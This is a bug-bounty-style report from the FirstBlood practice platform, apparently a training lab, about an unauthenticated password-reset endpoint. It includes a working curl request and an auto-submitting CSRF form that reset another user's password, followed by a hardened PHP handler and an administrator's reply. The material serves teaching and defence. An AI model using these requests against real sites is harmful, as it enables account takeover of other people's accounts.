FirstBlood-#386: Any user can update another user's password via the /drpanel/drapi/editpassword.php endpoint
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-25, panya Level 7 reported:

Steps to reproduce:

  1. Register a doctor (e.g. with the name admin and test as the invitation code).
  2. Don't log in with the provided credentials.
  3. Update the user password via this request:
    curl -X POST 'https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php' --data-raw 'username=admin'

    It works for any user and returns the newly generated password for the provided username.

    Password updated - s3mKUOhRTFvEo6Z

Actual result:

The password of the admin user will be updated to s3mKUOhRTFvEo6Z. An attacker could log in with this password and take over the account.

Expected result:

The /drpanel/drapi/editpassword.php endpoint should properly validate user role and should be accessible only for admins.

UPDATE:

I'm not sure if it is a different bug or not, but this endpoint also doesn't have any CSRF protection; it could be exploited via this basic PoC:

<body onload="document.forms[0].submit()">
  <form method="post" action="https://579a3c7897af-panya.a.firstbloodhackers.com/drpanel/drapi/editpassword.php">
    <input type="hidden" name="username" value="admin">
  </form>
</body>

By visiting an HTML page with this code, the admin user's password will be updated to a newly generated value.

P1 CRITICAL

Endpoint: /drpanel/drapi/editpassword.php

Parameter: username

Payload: admin


FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admin's password (dradmin) from /drapi/editpassword as it only looks at the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
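The two checks the report says are missing, a role check (the expected result) and CSRF protection (the UPDATE), shown in a hardened version of such an endpoint. This is an added example, not FirstBlood's code; it assumes a login that stores 'user', 'role' and a per-session 'csrf_token' in $_SESSION, and a PDO connection $db with a users table (username, password_hash).

```php
<?php
// Hardened password-reset handler (added example; hypothetical, not FirstBlood's own code).
// The vulnerable endpoint described in the report read only $_POST['username'] and
// reset that account; everything below except step 5 is what it did not do.
declare(strict_types=1);
session_start();

function respond(int $status, string $msg): void {
    http_response_code($status);
    header('Content-Type: text/plain');
    echo $msg;
    exit;
}

// 1. Only accept POST, so a plain link or image tag cannot trigger a reset.
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    respond(405, 'Method not allowed');
}
// 2. Caller must be logged in AND hold the admin role (the missing role check).
if (empty($_SESSION['user']) || ($_SESSION['role'] ?? '') !== 'admin') {
    respond(403, 'Forbidden');
}
// 3. Per-session CSRF token, compared in constant time (the missing CSRF check).
//    The token is assumed to be generated at login with bin2hex(random_bytes(32)).
$token = $_POST['csrf_token'] ?? '';
if (!is_string($token) || empty($_SESSION['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $token)) {
    respond(403, 'Invalid CSRF token');
}
// 4. Validate the target username instead of passing it straight to the query.
$username = $_POST['username'] ?? '';
if (!is_string($username) || !preg_match('/^[A-Za-z0-9_]{3,32}$/', $username)) {
    respond(400, 'Invalid username');
}
// 5. Generate the new password server-side and store only a hash of it.
$newPassword = bin2hex(random_bytes(12));
$stmt = $db->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
$stmt->execute([password_hash($newPassword, PASSWORD_DEFAULT), $username]);
if ($stmt->rowCount() !== 1) {
    respond(404, 'No such user');
}
// 6. Log who reset whose password so an unexpected caller shows up in the audit trail.
error_log(sprintf('password reset for %s by admin %s', $username, $_SESSION['user']));
// Return the generated value as the original endpoint did, but now only to an admin
// who passed the checks above.
respond(200, 'Password updated - ' . $newPassword);
```

The same session token must be embedded as a hidden csrf_token field in the admin's own form; the attacker's cross-site form in the report cannot read it, so the request in step 3 fails before any update runs.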

Report Feedback

@zseano

Creator & Administrator


Hi panya, nice find! The intended issue was to be able to login as 'drAdmin' which could be found from user enumeration (different error message produced), or from FirstBlood v1. However you are correct you can update any user's password, but the 'admin' account doesn't actually have any special powers. drAdmin is the root admin